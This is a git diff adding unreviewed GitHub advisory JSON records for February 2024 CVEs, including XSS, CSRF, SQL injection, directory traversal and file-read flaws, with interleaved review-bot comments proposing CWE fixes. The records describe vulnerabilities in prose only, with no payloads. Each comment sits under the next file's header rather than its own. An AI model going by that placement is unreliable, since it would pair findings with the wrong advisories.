+ "modified": "2024-02-02T18:30:31Z",
+ "published": "2024-02-02T18:30:31Z",
+ "aliases": [
+ "CVE-2023-41274"
+ ],
+ "details": "A NULL pointer dereference vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to launch a denial-of-service (DoS) attack via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.2.2533 build 20230926 and later\nQuTS hero h5.1.2.2534 build 20230927 and later\nQuTScloud c5.1.5.2651 and later\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41274"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.qnap.com/en/security-advisory/qsa-23-38"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-476"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T16:15:47Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-r92x-24fv-xvcc/GHSA-r92x-24fv-xvcc.json b/advisories/unreviewed/2024/02/GHSA-r92x-24fv-xvcc/GHSA-r92x-24fv-xvcc.json
new file mode 100644
index 0000000000000..5b855b99fee74
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-r92x-24fv-xvcc/GHSA-r92x-24fv-xvcc.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-r92x-24fv-xvcc",
+ "modified": "2024-02-06T03:32:59Z",
+ "published": "2024-02-01T12:30:23Z",
+ "aliases": [
+ "CVE-2023-51506"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in realmag777 WPCS – WordPress Currency Switcher Professional allows Stored XSS.This issue affects WPCS – WordPress Currency Switcher Professional: from n/a through 1.2.0.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51506"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/vulnerability/currency-switcher/wordpress-wpcs-plugin-1-2-0-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-01T12:15:53Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-r947-98rq-44mh/GHSA-r947-98rq-44mh.json b/advisories/unreviewed/2024/02/GHSA-r947-98rq-44mh/GHSA-r947-98rq-44mh.json
new file mode 100644
index 0000000000000..512abd987a063
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-r947-98rq-44mh/GHSA-r947-98rq-44mh.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-r947-98rq-44mh",
+ "modified": "2024-02-06T03:33:00Z",
+ "published": "2024-02-06T03:33:00Z",
+ "aliases": [
+ "CVE-2024-20824"
+ ],
+ "details": "Implicit intent hijacking vulnerability in VoiceSearch of Galaxy Store prior to version 4.5.63.6 allows local attackers to access sensitive information via implicit intent.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20824"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=02"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T03:15:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-r9gf-3xf2-q7x5/GHSA-r9gf-3xf2-q7x5.json b/advisories/unreviewed/2024/02/GHSA-r9gf-3xf2-q7x5/GHSA-r9gf-3xf2-q7x5.json
new file mode 100644
index 0000000000000..0a52eefdeb559
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-r9gf-3xf2-q7x5/GHSA-r9gf-3xf2-q7x5.json
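Review bot: `cwe_ids` is empty although `details` names the weakness precisely ("Implicit intent hijacking ... access sensitive information via implicit intent"); the CWE entry that appears to match that wording is CWE-927 (Use of Implicit Intent for Sensitive Communication), and `"cwe_ids": [ "CWE-927" ]` would be the proposal, to be confirmed against the Samsung bulletin's own classification since the record carries none. The reference is the monthly bulletin index `serviceWeb.smsb?year=2024&month=02`, not a per-CVE page, so a reader has to search the page for the ID; if Samsung publishes a stable per-issue anchor it would be the better link. The CVSS vector (`AV:L`, `UI:R`, `C:H`) is consistent with a local app coaxing the user into triggering the intent, so nothing else in the record looks off.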
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-r9gf-3xf2-q7x5",
+ "modified": "2024-02-08T15:30:27Z",
+ "published": "2024-02-08T15:30:27Z",
+ "aliases": [
+ "CVE-2024-24878"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PT Woo Plugins (by Webdados) Portugal CTT Tracking for WooCommerce allows Reflected XSS.This issue affects Portugal CTT Tracking for WooCommerce: from n/a through 2.1.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24878"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/vulnerability/portugal-ctt-tracking-woocommerce/wordpress-portugal-ctt-tracking-for-woocommerce-plugin-2-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-08T13:15:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-rch8-65jx-7vj9/GHSA-rch8-65jx-7vj9.json b/advisories/unreviewed/2024/02/GHSA-rch8-65jx-7vj9/GHSA-rch8-65jx-7vj9.json
new file mode 100644
index 0000000000000..d4e0c4a66ecf6
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-rch8-65jx-7vj9/GHSA-rch8-65jx-7vj9.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-rch8-65jx-7vj9",
+ "modified": "2024-02-06T06:30:32Z",
+ "published": "2024-02-06T06:30:32Z",
+ "aliases": [
+ "CVE-2023-43535"
+ ],
+ "details": "Memory corruption when negative display IDs are sent as input while processing DISPLAYESCAPE event trigger.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43535"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-129"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T06:16:03Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-rf3h-hj2j-v6cr/GHSA-rf3h-hj2j-v6cr.json b/advisories/unreviewed/2024/02/GHSA-rf3h-hj2j-v6cr/GHSA-rf3h-hj2j-v6cr.json
new file mode 100644
index 0000000000000..f062b35ecb98d
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-rf3h-hj2j-v6cr/GHSA-rf3h-hj2j-v6cr.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-rf3h-hj2j-v6cr",
+ "modified": "2024-02-06T00:30:27Z",
+ "published": "2024-02-06T00:30:27Z",
+ "aliases": [
+ "CVE-2024-0790"
+ ],
+ "details": "The WOLF – WordPress Posts Bulk Editor and Manager Professional plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.8.1. This is due to missing or incorrect nonce validation on the wpbe_create_new_term, wpbe_update_tax_term, and wpbe_delete_tax_term functions. This makes it possible for unauthenticated attackers to create, modify and delete taxonomy terms via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. Furthermore, the functions wpbe_save_options, wpbe_bulk_delete_posts_count, wpbe_bulk_delete_posts, and wpbe_save_meta are vulnerable to Cross-Site Request Forgery allowing for plugin options update, post count deletion, post deletion and modification of post metadata via forged request.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0790"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/bulk-editor/trunk/index.php"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3028699%40bulk-editor%2Ftrunk&old=3012874%40bulk-editor%2Ftrunk&sfp_email=&sfph_mail="
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6c48f94b-d193-429a-9383-628ae12bfdf3?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T22:16:04Z"
+ }
+}
\ No newline at end of file
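Review bot: `cwe_ids` is empty for a record whose `details` is explicitly a Cross-Site Request Forgery from missing or incorrect nonce validation, so `"cwe_ids": [ "CWE-352" ]` is the obvious classification and its absence leaves this entry invisible to CWE-based filtering. The `details` text lists seven affected handlers (`wpbe_create_new_term` ... `wpbe_save_meta`) with two impact levels — taxonomy-term tampering and, for the second group, plugin-option updates and post deletion — which is more than the CVSS vector's `I:L/A:L` conveys; that scoring comes from the source and should not be changed here, but a reviewer should be aware the bulk post-deletion path is arguably the more serious one. The `browser/bulk-editor/trunk/index.php` reference has no revision pin, so it will keep pointing at whatever `trunk` becomes; the changeset link already present is the durable one.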
diff --git a/advisories/unreviewed/2024/02/GHSA-rfgg-652g-cx2q/GHSA-rfgg-652g-cx2q.json b/advisories/unreviewed/2024/02/GHSA-rfgg-652g-cx2q/GHSA-rfgg-652g-cx2q.json
new file mode 100644
index 0000000000000..e2098a400604e
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-rfgg-652g-cx2q/GHSA-rfgg-652g-cx2q.json
@@ -0,0 +1,39 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-rfgg-652g-cx2q",
+ "modified": "2024-02-07T00:30:26Z",
+ "published": "2024-02-07T00:30:26Z",
+ "aliases": [
+ "CVE-2024-24002"
+ ],
+ "details": "jshERP v3.3 is vulnerable to SQL Injection. The com.jsh.erp.controller.MaterialController: com.jsh.erp.utils.BaseResponseInfo getListWithStock() function of jshERP does not filter `column` and `order` parameters well enough, and an attacker can construct malicious payload to bypass jshERP's protection mechanism in `safeSqlParse` method for sql injection.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24002"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/jishenghua/jshERP/issues/99"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24002.txt"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-07T00:15:56Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-rhq8-qg6g-j259/GHSA-rhq8-qg6g-j259.json b/advisories/unreviewed/2024/02/GHSA-rhq8-qg6g-j259/GHSA-rhq8-qg6g-j259.json
new file mode 100644
index 0000000000000..2876b9b00000c
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-rhq8-qg6g-j259/GHSA-rhq8-qg6g-j259.json
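Review bot: `cwe_ids` is empty although `details` states SQL injection through unfiltered `column` and `order` parameters that bypass `safeSqlParse`, so `"cwe_ids": [ "CWE-89" ]` should be set; the same gap applies to the sibling jshERP record for CVE-2024-24004, which cites the same `jshERP/issues/99` thread. With both `severity` arrays empty and `database_specific.severity` `null` the record is unscored, and the description gives consumers no hint of required privileges (the ERP controllers are presumably authenticated, but that is inference, not stated), so anyone triaging this needs the upstream issue. The only non-NVD references are a GitHub issue and a personal PoC repository (`cxcxcxcxcxcxcxc/.../24002.txt`), neither of which is a vendor advisory or a fix commit; `affected` is empty, so no fixed version is recorded anywhere in the file.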
@@ -0,0 +1,39 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-rhq8-qg6g-j259",
+ "modified": "2024-02-07T00:30:26Z",
+ "published": "2024-02-07T00:30:26Z",
+ "aliases": [
+ "CVE-2024-24004"
+ ],
+ "details": "jshERP v3.3 is vulnerable to SQL Injection. The com.jsh.erp.controller.DepotHeadController: com.jsh.erp.utils.BaseResponseInfo findInOutDetail() function of jshERP does not filter `column` and `order` parameters well enough, and an attacker can construct malicious payload to bypass jshERP's protection mechanism in `safeSqlParse` method for sql injection.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24004"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/jishenghua/jshERP/issues/99"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24004.txt"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-07T00:15:56Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-rj43-7hfm-whrc/GHSA-rj43-7hfm-whrc.json b/advisories/unreviewed/2024/02/GHSA-rj43-7hfm-whrc/GHSA-rj43-7hfm-whrc.json
new file mode 100644
index 0000000000000..e80cf867fd007
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-rj43-7hfm-whrc/GHSA-rj43-7hfm-whrc.json
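Review bot: `cwe_ids` is empty for a SQL-injection record (`findInOutDetail()` with unfiltered `column` and `order` bypassing `safeSqlParse`), so `"cwe_ids": [ "CWE-89" ]` should be set, matching what the sibling CVE-2024-24002 entry for `getListWithStock()` also needs. The two jshERP records share the same `safeSqlParse` root cause and the same `jshERP/issues/99` reference; since the weakness is in the shared sanitizer rather than the two controllers, a consumer would benefit from knowing that fixing one without the other leaves the same bypass reachable, although that is inferred from the identical wording rather than stated. Severity is `null`/empty and `affected` is empty, so the record carries no score and no fixed version.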
@@ -0,0 +1,39 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-rj43-7hfm-whrc",
+ "modified": "2024-02-07T09:30:31Z",
+ "published": "2024-02-07T09:30:31Z",
+ "aliases": [
+ "CVE-2024-24304"
+ ],
+ "details": "In the module \"Mailjet\" (mailjet) from Mailjet for PrestaShop before versions 3.5.1, a guest can download technical information without restriction.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24304"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/mailjet/prestashop-mailjet-plugin-apiv3/releases/tag/v3.5.1"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.friendsofpresta.org/modules/2024/02/06/mailjet.html"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-07T09:15:15Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-rjcv-w9x4-9624/GHSA-rjcv-w9x4-9624.json b/advisories/unreviewed/2024/02/GHSA-rjcv-w9x4-9624/GHSA-rjcv-w9x4-9624.json
new file mode 100644
index 0000000000000..1543b4b703e73
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-rjcv-w9x4-9624/GHSA-rjcv-w9x4-9624.json
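Review bot: `cwe_ids` is empty and the `details` text ("a guest can download technical information without restriction") is too thin to classify with confidence on its own — it reads as either missing authorization on the download endpoint (CWE-862) or exposure of sensitive information to an unauthorized actor (CWE-200), and the FriendsOfPresta write-up referenced should settle which; whichever it is, leaving the array empty hides the record from CWE-based queries. Severity is `null` with no CVSS vector, so the record is unscored even though "guest" implies unauthenticated network access, which is worth backfilling from the source rather than inferring here. The fixed version 3.5.1 is present only in prose and in the release-tag URL; `affected` is empty, so nothing is machine-matchable.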
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-rjcv-w9x4-9624",
+ "modified": "2024-02-01T12:30:22Z",
+ "published": "2024-02-01T12:30:22Z",
+ "aliases": [
+ "CVE-2023-51669"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Artios Media Product Code for WooCommerce allows Stored XSS.This issue affects Product Code for WooCommerce: from n/a through 1.4.4.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51669"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/vulnerability/product-code-for-woocommerce/wordpress-product-code-for-woocommerce-plugin-1-4-4-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-01T11:15:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-rm4j-xw99-x97h/GHSA-rm4j-xw99-x97h.json b/advisories/unreviewed/2024/02/GHSA-rm4j-xw99-x97h/GHSA-rm4j-xw99-x97h.json
new file mode 100644
index 0000000000000..e229e7d527b2c
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-rm4j-xw99-x97h/GHSA-rm4j-xw99-x97h.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-rm4j-xw99-x97h",
+ "modified": "2024-02-08T15:30:26Z",
+ "published": "2024-02-08T12:30:48Z",
+ "aliases": [
+ "CVE-2023-6518"
+ ],
+ "details": "Plaintext Storage of a Password vulnerability in Mia Technology Inc. MİA-MED allows Read Sensitive Strings Within an Executable.This issue affects MİA-MED: before 1.0.7.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6518"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.usom.gov.tr/bildirim/tr-24-0087"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-256"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-08T12:15:55Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-rmw7-92wx-897r/GHSA-rmw7-92wx-897r.json b/advisories/unreviewed/2024/02/GHSA-rmw7-92wx-897r/GHSA-rmw7-92wx-897r.json
new file mode 100644
index 0000000000000..eec5625346571
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-rmw7-92wx-897r/GHSA-rmw7-92wx-897r.json
@@ -0,0 +1,50 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-rmw7-92wx-897r",
+ "modified": "2024-02-06T00:30:27Z",
+ "published": "2024-02-06T00:30:27Z",
+ "aliases": [
+ "CVE-2024-0448"
+ ],
+ "details": "The Elementor Addons by Livemesh plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widget URL parameters in all versions up to, and including, 8.3.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor access or higher to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0448"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/addons-for-elementor/trunk/templates/addons/services/content.php#L20"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/addons-for-elementor/trunk/templates/addons/team-members/style1.php#L17"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3026261%40addons-for-elementor%2Ftrunk&old=3022220%40addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail="
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/058d1aa0-2ef6-49a4-b978-43a91c8e55f3?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T22:16:01Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-rpjv-hwjc-55jj/GHSA-rpjv-hwjc-55jj.json b/advisories/unreviewed/2024/02/GHSA-rpjv-hwjc-55jj/GHSA-rpjv-hwjc-55jj.json
new file mode 100644
index 0000000000000..67aacc43005e2
--- /dev/null
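Review bot: `cwe_ids` is empty for a stored-XSS record ("insufficient input sanitization and output escaping" on widget URL parameters), so `"cwe_ids": [ "CWE-79" ]` should be set to match the other XSS entries in this batch and to make the record findable by weakness class. The `details` text says "widget URL parameters" without naming which widgets, while the two `browser/.../trunk/templates/addons/services/content.php#L20` and `team-members/style1.php#L17` references narrow it to the services and team-members templates; those are line anchors on an unpinned `trunk`, so they will stop pointing at the relevant lines as the plugin moves, and the changeset diff link (`old=3022220`, `new=3026261`) is the durable pointer. The rest of the record (CVSS `PR:L`, contributor-level in prose) is internally consistent.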
+++ b/advisories/unreviewed/2024/02/GHSA-rpjv-hwjc-55jj/GHSA-rpjv-hwjc-55jj.json
@@ -0,0 +1,50 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-rpjv-hwjc-55jj",
+ "modified": "2024-02-06T00:30:26Z",
+ "published": "2024-02-06T00:30:26Z",
+ "aliases": [
+ "CVE-2024-0221"
+ ],
+ "details": "The Photo Gallery by 10Web – Mobile-Friendly Image Gallery plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.8.19 via the rename_item function. This makes it possible for authenticated attackers to rename arbitrary files on the server. This can lead to site takeovers if the wp-config.php file of a site can be renamed. By default this can be exploited by administrators only. In the premium version of the plugin, administrators can give gallery management permissions to lower level users, which might make this exploitable by users as low as contributors.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0221"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/photo-gallery/trunk/filemanager/controller.php#L291"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/photo-gallery/trunk/filemanager/controller.php#L441"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3022981%40photo-gallery%2Ftrunk&old=3013021%40photo-gallery%2Ftrunk&sfp_email=&sfph_mail="
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3a3b8f32-f29d-4e67-8fad-202bfc8a9918?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T22:15:59Z"
+ }
+}
\ No newline at end of file
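Review bot: `cwe_ids` is empty for a record that `details` explicitly labels "Directory Traversal ... via the rename_item function", so `"cwe_ids": [ "CWE-22" ]` is the missing classification, and it matters more than usual here because the record is `CRITICAL`. The `details` text makes an important caveat that the structured fields do not capture: the CVSS vector is scored `PR:H` (admin-only, the default), but the premium version lets administrators delegate gallery management down to contributors, which would make the same `wp-config.php` rename reachable from a much lower-privileged account; consumers who triage on the vector alone will under-rate premium installs, and that nuance is worth surfacing in any reviewed version of this entry. The two `controller.php#L291` / `#L441` references are unpinned `trunk` line anchors and will drift; the changeset diff link is the durable pointer.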
diff --git a/advisories/unreviewed/2024/02/GHSA-rpw7-c5cp-v8vp/GHSA-rpw7-c5cp-v8vp.json b/advisories/unreviewed/2024/02/GHSA-rpw7-c5cp-v8vp/GHSA-rpw7-c5cp-v8vp.json
new file mode 100644
index 0000000000000..ef4938006daf3
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-rpw7-c5cp-v8vp/GHSA-rpw7-c5cp-v8vp.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-rpw7-c5cp-v8vp",
+ "modified": "2024-02-07T03:30:33Z",
+ "published": "2024-02-07T03:30:33Z",
+ "aliases": [
+ "CVE-2024-0849"
+ ],
+ "details": "Leanote version 2.7.0 allows obtaining arbitrary local files. This is possible\n\nbecause the application is vulnerable to LFR.\n\n\n\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0849"
+ },
+ {
+ "type": "WEB",
+ "url": "https://fluidattacks.com/advisories/alesso"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/leanote/desktop-app"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-20"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-07T03:15:50Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-rpxv-j4q4-prcp/GHSA-rpxv-j4q4-prcp.json b/advisories/unreviewed/2024/02/GHSA-rpxv-j4q4-prcp/GHSA-rpxv-j4q4-prcp.json
new file mode 100644
index 0000000000000..b98afdb9c6ca4
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-rpxv-j4q4-prcp/GHSA-rpxv-j4q4-prcp.json
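Review bot: `cwe_ids` carries only the catch-all `CWE-20` (Improper Input Validation) while `details` describes arbitrary local file read ("obtaining arbitrary local files ... vulnerable to LFR"), for which CWE-22 (path traversal) or CWE-200 (information exposure) would be the specific class; which one applies depends on the mechanism in the Fluid Attacks advisory, which the record does not summarize, so this is a request to check the source rather than a definite relabel. The `details` string also contains a hard paragraph break mid-sentence (`"This is possible\n\nbecause ..."`) plus five trailing `\n`, which will render as a broken sentence on the advisory page — that text comes from the CNA and cannot be fixed in this file, but it is worth raising upstream. The CVSS vector (`AV:L`, `UI:R`) together with the `leanote/desktop-app` reference suggests this is the desktop client rather than the server, which is an inference a reviewer should confirm before marking the record reviewed.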
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-rpxv-j4q4-prcp",
+ "modified": "2024-02-06T00:30:27Z",
+ "published": "2024-02-06T00:30:27Z",
+ "aliases": [
+ "CVE-2024-0382"
+ ],
